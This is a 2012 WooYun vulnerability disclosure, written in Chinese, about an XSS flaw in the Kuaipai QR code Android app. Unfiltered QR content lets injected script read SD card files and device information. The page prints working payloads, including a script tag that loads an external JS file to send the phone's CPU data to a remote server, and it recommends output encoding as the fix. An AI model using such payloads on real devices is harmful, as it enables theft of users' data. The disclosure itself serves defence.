当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
二维码软件任意读取SD卡漏洞
漏洞作者:
提交时间:
2012-08-12 01:25
修复时间:
2012-09-26 01:25
公开时间:
2012-09-26 01:25
漏洞类型:
敏感信息泄露
危害等级:
自评Rank:
5
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2012-08-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

快拍二维码在显示解析出来的二维码内容的时候未做任何过滤,导致产生XSS。

详细说明:

快拍二维码对二维码处理后显示的时候未过滤和编码,导致可以进行XSS攻击。
可以通过嵌入脚本执行任意的JS代码,可以通过发送ajax请求对有权限的文件进行去读,并且将读取到的内容发送到网络上。可以获取包括SD卡中软件数据,以及手机的cpu信息等。

漏洞证明:

测试代码

<script>alert(\www.insight-labs.org\);</script>


<script src=http://www.sec06.com/xss.js></script>


以上两个代码的二维码图片为(大家可以扫描测试):



用快拍二维码扫描第二个二维码图片,然后访问http://www.sec06.com/MobileInfo.txt就可以看到你手机的CPU信息。
代码大家可以看http://www.sec06.com/xss.js的代码。
注:本人手机系统是Android2.2的系统。快拍二维码软件为最新版本。其他系统未测试。
以下是获取手机CPU信息并且发送到网络的动态图片。GIF图片有点大,请大家等待一会。

修复方案:

对解析出的内容进行编码处理。

版权声明:转载请注明来源 insight-labs@乌云


>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝